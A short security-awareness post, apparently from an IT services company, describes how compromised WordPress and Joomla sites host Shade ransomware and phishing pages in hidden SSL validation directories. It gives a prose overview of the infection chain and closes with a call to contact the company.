Compromised WordPress and Joomla websites are being hacked to deliver ransomware and malware


Websites built on both WordPress and Joomla, two of the most popular content management systems used in publishing, are being used to deliver ransomware and other malware to visitors by hackers.

The hackers are exploiting vulnerabilities in themes, plug-ins and extensions on WordPress and Joomla and using them to deliver ransomware, phishing pages, backdoors, and redirectors.

Researchers have recently seen a spike in the number of infected domains that have been compromised in order to deliver these malicious attacks upon innocent users.

These attacks are being carried out through the use of a hidden directory on HTTPS. This well-known directory is used commonly by website owners in order to demonstrate ownership of the domain to the certificate authority that scans for code to verify that the domain is valid.

Cybercriminals, however, are using exploits to gain access to these hidden pages, where they can then hide malware and other malicious content from website administrators.

The most common threat deployed in this way has been Shade ransomware. Shade ransomware is also known as Troldesh ransomware.

More than 500 websites have been compromised, and thousands of attempts have been made to infect users coming across those sites with ransomware, phishing links, and other malicious content.

Spam emails from these sites usually contain a link to the HTML redirector page hosted on the compromised site, which when clicked downloads the malicious zip file. All the user needs to do is open the JavaScript file inside the zip file and the JavaScript file will download the ransomware from the compromised site and execute it on the victim’s device.

Phishing pages for these sites are hosted under SSL-validated hidden directories and pop-up in order to fool the potential victim into entering their username and password.

Compromised WordPress sites are on versions 4.8.9 to 5.1.1 and tend to be using outdated CMS themes or server-side software.

To read more about the technical analysis of the attacks, please see the link below.

As always, if we can be of help with your network or computer, give us a call here at RHYNO Networks. (855) 749-6648